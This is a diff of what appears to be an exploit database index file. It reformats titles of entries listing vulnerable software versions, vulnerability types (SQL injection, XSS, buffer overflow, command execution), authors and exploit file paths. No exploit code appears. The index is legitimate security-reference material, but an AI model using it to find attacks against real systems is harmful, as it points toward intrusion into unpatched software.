id,file,description,date,author,platform,type,port 23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 Malformed Layer 2 Frame Denial of Service Vulnerability",2004-02-03,blackangels,hardware,dos,0 -23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 +23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x Export.PHP File Disclosure Vulnerability",2004-02-03,"Cedric Cochin",php,webapps,0 23641,platforms/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service Vulnerability (1)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service Vulnerability (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 @@ -20845,7 +20845,7 @@ id,file,description,date,author,platform,type,port 23666,platforms/php/webapps/23666.txt,"JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerability",2004-02-09,"David Sopas Ferreira",php,webapps,0 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 Malformed UUEncoded Message Denial of Service Vulnerability",2004-02-09,"Oliver Eikemeier",linux,dos,0 23668,platforms/windows/remote/23668.txt,"Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness",2004-02-07,Jelmer,windows,remote,0 -23669,platforms/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x 'Reviews' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0 +23669,platforms/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x - 'Reviews' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0 23670,platforms/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x Public Message SQL Injection Vulnerability",2004-02-09,"Janek Vind",php,webapps,0 23671,platforms/linux/remote/23671.txt,"Caucho Technology Resin 2.1.12 Directory Listings Disclosure Vulnerability",2004-02-09,"Wang Yun",linux,remote,0 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0 @@ -20864,7 +20864,7 @@ id,file,description,date,author,platform,type,port 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x SQL Injection Vulnerability",2004-02-11,G00db0y,php,webapps,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x Missing Host Field Denial of Service Vulnerability",2004-02-11,"Luigi Auriemma",windows,dos,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4 .6 (Build 260) - Web Interface Authentication Bypass Vulnerability",2004-02-12,"Ziv Kamir",php,webapps,0 -23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x Cross-Site Scripting Vulnerability",2004-02-12,"Jamie Fisher",php,webapps,0 +23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting Vulnerability",2004-02-12,"Jamie Fisher",php,webapps,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service Vulnerability",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability",2004-02-12,"Greg MacManus",linux,dos,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 Search.PHP Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 @@ -20876,8 +20876,8 @@ id,file,description,date,author,platform,type,port 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 -23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0 -23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 Remote Send File Request Denial of Service Vulnerability",2004-02-16,"intuit e.b.",windows,dos,0 +23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0 +23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 - Remote Send File Request Denial of Service Vulnerability",2004-02-16,"intuit e.b.",windows,dos,0 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x Custva.asp redirectUrl Parameter XSS",2004-02-16,"Nick Gudov",asp,webapps,0 @@ -20908,9 +20908,9 @@ id,file,description,date,author,platform,type,port 23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability",2004-02-18,"Nick Gudov",asp,webapps,0 23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x Buddy Icon Predictable File Location Weakness",2004-02-19,"Michael Evanchik",windows,remote,0 23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service Vulnerability",2004-02-20,"intuit bug_hunter",windows,dos,0 -23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1)",2004-02-20,PaLbOsA,windows,remote,0 -23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2)",2004-02-20,Li0n7,windows,remote,0 -23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 Remote Buffer Overflow Vulnerability (3)",2004-02-20,NoRpiuS,windows,remote,0 +23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow Vulnerability (1)",2004-02-20,PaLbOsA,windows,remote,0 +23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow Vulnerability (2)",2004-02-20,Li0n7,windows,remote,0 +23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow Vulnerability (3)",2004-02-20,NoRpiuS,windows,remote,0 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS <= 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 @@ -20927,14 +20927,14 @@ id,file,description,date,author,platform,type,port 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 CSS HTML Injection Vulnerability",2004-02-23,"Michael Scovetta",php,webapps,0 23750,platforms/php/webapps/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",php,webapps,0 -23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability",2004-02-24,"Jeremy Bae",windows,remote,0 -23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",windows,dos,0 +23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal Vulnerability",2004-02-24,"Jeremy Bae",windows,remote,0 +23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 phptest.php Path Disclosure Vulnerability",2004-02-24,"Rafel Ivgi",php,webapps,0 23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",2012-12-31,metasploit,windows,remote,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",multiple,dos,0 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 Cross-Site Scripting Vulnerability",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",linux,dos,0 -23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 +23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal Vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x MFormat Privilege Escalation Vulnerability",2004-02-25,"Sebastian Krahmer",linux,local,0 23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (1)",2004-02-26,saintjmf,windows,dos,0 23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (2)",2004-02-26,shaun2k2,windows,dos,0 @@ -20947,11 +20947,11 @@ id,file,description,date,author,platform,type,port 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0 23769,platforms/windows/dos/23769.pl,"argosoft ftp server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 -23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 +23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x auth.c auth_ident() Function Overflow",2004-03-01,CMN,linux,remote,0 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 Cross-Site Scripting Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 -23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 +23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 NULL URL Character Unauthorized Access Vulnerability",2004-03-01,"Mitch Adair",linux,remote,0 23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial of Service Vulnerability",2004-03-01,"Shaun Colley",hardware,dos,0 @@ -20967,9 +20967,9 @@ id,file,description,date,author,platform,type,port 23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service Vulnerability (2)",2004-03-02,shaun2k2,hardware,dos,0 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting Vulnerability",2003-09-10,"Liu Die Yu",windows,remote,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 -23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 +23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 23793,platforms/osx/dos/23793.txt,"Apple Safari 1.x Large JavaScript Array Handling Denial of Service Vulnerability",2004-03-06,kang,osx,dos,0 -23794,platforms/linux/remote/23794.txt,"PWebServer 0.3.x Remote Directory Traversal Vulnerability",2004-03-08,"Donato Ferrante",linux,remote,0 +23794,platforms/linux/remote/23794.txt,"PWebServer 0.3.x - Remote Directory Traversal Vulnerability",2004-03-08,"Donato Ferrante",linux,remote,0 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 Pop Parameter Cross-Site Scripting Vulnerability",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability",2004-03-09,shaun2k2,windows,remote,0 23797,platforms/php/webapps/23797.txt,"Confixx 2 DB Parameter SQL Injection Vulnerability",2004-03-09,wkr,php,webapps,0 @@ -20986,7 +20986,7 @@ id,file,description,date,author,platform,type,port 23808,platforms/hardware/remote/23808.txt,"IP3 Networks IP3 NetAccess Appliance SQL Injection Vulnerability",2004-03-12,"Syam Yanuar",hardware,remote,0 23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 emumail.fcgi Multiple Parameter XSS",2004-03-12,dr_insane,cgi,webapps,0 -23811,platforms/linux/remote/23811.c,"MathoPD 1.x Remote Buffer Overflow Vulnerability",2003-11-02,aion,linux,remote,0 +23811,platforms/linux/remote/23811.c,"MathoPD 1.x - Remote Buffer Overflow Vulnerability",2003-11-02,aion,linux,remote,0 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilites",2004-03-15,"Cheng Peng Su",php,webapps,0 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway Remote Authentication Bypass Vulnerability",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module fname Parameter XSS",2004-03-15,"Janek Vind",php,webapps,0 @@ -21013,7 +21013,7 @@ id,file,description,date,author,platform,type,port 23839,platforms/windows/dos/23839.pl,"GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2 SITE Command Remote Buffer Overflow Vulnerability",2004-03-17,storm,windows,dos,0 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (2)",2004-03-17,mattox,aix,local,0 -23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 Remote Denial of Service Vulnerability",2004-03-17,"Beyond Security",windows,dos,0 +23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service Vulnerability",2004-03-17,"Beyond Security",windows,dos,0 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 Authentication Bypass Vulnerability",2004-03-17,"saudi linux",php,webapps,0 23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 error.php language Variable Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 error.php Multiple Variables XSS",2004-03-18,"Janek Vind",php,webapps,0 @@ -21035,24 +21035,24 @@ id,file,description,date,author,platform,type,port 23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 category_news.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 NEWS_LOGIN Cookie ADMIN Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 -23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 +23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal Vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 23865,platforms/php/webapps/23865.txt,"VBulletin 2.x Private.PHP Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 -23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 +23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injection Vulnerabilities",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 Comments function id Parameter SQL Injection Vulnerability",2004-03-22,JeiAr,php,webapps,0 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability",2004-03-22,"Janek Vind",php,webapps,0 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 TargetName Parameter Cross-Site Scripting Vulnerability",2004-03-22,"Richard Maudsley",windows,remote,0 -23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal vulnerability",2004-03-22,snifer,jsp,webapps,0 +23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal Vulnerability",2004-03-22,snifer,jsp,webapps,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x Encryption Key Signing Vulnerability",2004-03-23,"Todd Chapman",multiple,remote,0 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 vfs_getvfssw function Local Privilege Escalation Vulnerability",2004-03-23,"Sinan Eren",solaris,local,0 23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability",2004-03-24,"Tri Huynh",windows,remote,0 -23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 Remote Buffer Overflow Vulnerability",2004-03-24,"Luigi Auriemma",hardware,dos,0 -23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x Remote Directory Traversal Vulnerability",2004-03-24,"Ziv Kamir",windows,remote,0 +23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow Vulnerability",2004-03-24,"Luigi Auriemma",hardware,dos,0 +23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal Vulnerability",2004-03-24,"Ziv Kamir",windows,remote,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal Vulnerability",2004-03-24,wirepair,windows,remote,0 -23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 Remote Arbitrary Command Execution Vulnerability",2004-03-24,wirepair,windows,remote,0 -23881,platforms/linux/remote/23881.txt,"Emil 2.x Multiple Buffer Overrun and Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 +23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Remote Arbitrary Command Execution Vulnerability",2004-03-24,wirepair,windows,remote,0 +23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun and Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 23882,platforms/linux/local/23882.pas,"NetSupport School 7.0/7.5 Weak Password Encryption Vulnerability",2004-03-26,"spiffomatic 64",linux,local,0 23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 Invscoutd Symbolic Link Vulnerability",2003-05-29,watercloud,aix,local,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service Vulnerability",2004-03-26,"laurent oudot",linux,dos,0 @@ -21079,7 +21079,7 @@ id,file,description,date,author,platform,type,port 23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download Vulnerability",2004-04-01,"Donato Ferrante",windows,remote,0 23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability",2004-04-03,K-159,cgi,webapps,0 23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 MyHome.PHP SQL Injection Vulnerability",2004-04-05,"Mark Tesn",php,webapps,0 -23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal vulnerability",2004-04-05,dr_insane,windows,remote,0 +23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21105,7 +21105,7 @@ id,file,description,date,author,platform,type,port 23933,platforms/php/webapps/23933.txt,"NukeCalendar 1.1 .a eid Parameter SQL Injection",2004-04-08,"Janek Vind",php,webapps,0 23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 index.php language Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 view.php id Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 -23936,platforms/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote,0 +23936,platforms/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote,0 23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 viewmail.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 Index XSS",2004-04-08,dr_insane,cgi,webapps,0 23939,platforms/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 members.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 @@ -21136,7 +21136,7 @@ id,file,description,date,author,platform,type,port 23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23967,platforms/php/webapps/23967.txt,"E SMS Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0 +23967,platforms/php/webapps/23967.txt,"E Sms Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0 23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0 23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0 @@ -21153,7 +21153,7 @@ id,file,description,date,author,platform,type,port 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23986,platforms/cgi/webapps/23986.txt,"Blackboard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps,0 23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 User.CGI Directory Traversal Vulnerability",2004-04-12,dr_insane,cgi,remote,0 -23988,platforms/php/webapps/23988.txt,"Nuked-Klan 1.x Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 +23988,platforms/php/webapps/23988.txt,"Nuked-Klan 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability",2004-04-18,mslug@safechina.net,windows,local,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x CookieDecode Cross-Site Scripting Vulnerability",2004-04-13,waraxe,php,webapps,0 23991,platforms/php/webapps/23991.txt,"Tutos 1.1 .20031017 note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 @@ -21162,7 +21162,7 @@ id,file,description,date,author,platform,type,port 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection Vulnerability",2013-01-09,"Life Wasted",php,webapps,0 -23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 +23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 Cross-Site Scripting Vulnerability",2004-04-14,"Noam Rathaus",cgi,webapps,0 @@ -21174,7 +21174,7 @@ id,file,description,date,author,platform,type,port 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 user.php bugid Parameter XSS",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x Email Attachment Script Injection Vulnerability",2004-04-15,"spiffomatic 64",php,webapps,0 24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.PHP Remote File Include Command Injection Vulnerability",2004-04-15,jaguar,php,webapps,0 -24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x Denial of Service Vulnerability",2004-04-15,anonymous,windows,dos,0 +24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service Vulnerability",2004-04-15,anonymous,windows,dos,0 24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 Malformed STUN Packet Denial of Service Vulnerability",2004-04-08,storm,multiple,dos,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 Long URI Handling Memory Corruption Vulnerability",2004-04-16,"Luca Ercoli",windows,remote,0 24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 Oversized Error Message Denial of Service Vulnerability",2004-04-17,"K. K. Mookhey",multiple,dos,0 @@ -21191,7 +21191,7 @@ id,file,description,date,author,platform,type,port 24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution 